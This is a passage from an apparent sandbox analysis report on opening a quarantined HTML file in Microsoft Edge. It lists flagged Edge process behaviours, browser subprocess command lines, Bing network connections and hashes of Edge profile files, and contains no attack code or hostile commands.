N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2560 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ba2246f8,0x7ff8ba224708,0x7ff8ba224718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3128 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3c6e13dc1762aa873320bed152204f3c
SHA1 38df427d38ca5ce6ce203490a9fb8461c7444e12
SHA256 5c441148843b7c8dbff4c4a72962a532aaf0bdd484d07a03dd9a32fd461b1371
SHA512 133054cb042e11013bfdad1bd11e3407d08cf26a66d0743bea9708d261aa904a1047bb0097b187ecf8436cb6cff3bec28c89e435862cad0e0fa264799556b70c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f5da507c2059b715761792e7106405f0
SHA1 a277fd608467c5a666cf4a4a3e16823b93c6777f
SHA256 8c1d99de087ac5f2e7b2afce66eff36a646bef46800c0c1d7737d6f0df74b7e8
SHA512 01c92729dd8061aa122b116a674c73bb78016f66d2cb8f7fb64907352758a825e87a1e345334386440699d2a6d1e17baccb400c5aee151eb64e64019cbebb870

\??\pipe\LOCAL\crashpad_2560_IPXIRUHBMCTZIZTP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b1714b9cd75ac382f61a090f333f520
SHA1 7191b8e8f7cf5fecd33489dc7119bef1a833d6c1
SHA256 0505e56cb286f6371e3c3f80aa45a124cec3ecce0c3a31248d8deee8edefec88
SHA512 4eca557fb1178034818a1ec46e681b3936cc0edde93b36efdde813f4ab1f0ab74093388dba5d789d394e13a62b07c159d04fd89488951bcce35e36ae738b1c33

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1d4b5d6d4b2cc77c1748d5028b40f9fc
SHA1 9f3379d6162b95d74557d281bb403bb4a7ea17c5
SHA256 7e5a7ccafb2a041d8b444184799beec08bda9ab2b778c3df42cea52d85155ed9
SHA512 5899b9d61e04bab124f530af472f3b3b864b8c170e9a9a3d54d88ab77b85ae6b5bdef54c6f5cf03a839cd872359de80e11b9a6e3ca5b1f4b986b53cf9138a681

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8e07abdf4a3961e1baff4397a3ac770d
SHA1 743cd84f84cfe0bc6d8f2a620be541ead4ffc02e
SHA256 855a90255da0a76af0fdcee2c63ad9cabe22a84c2d983fb7cf688869538a96dc
SHA512 5d2ddcbf597eac6c8a2eca504e16084c3b86b597d83eebeb74f22c6fe9abf56973f9e2370c8daa4056077d774b9fff2ba316a778a4a7146d38da70ce7c20656a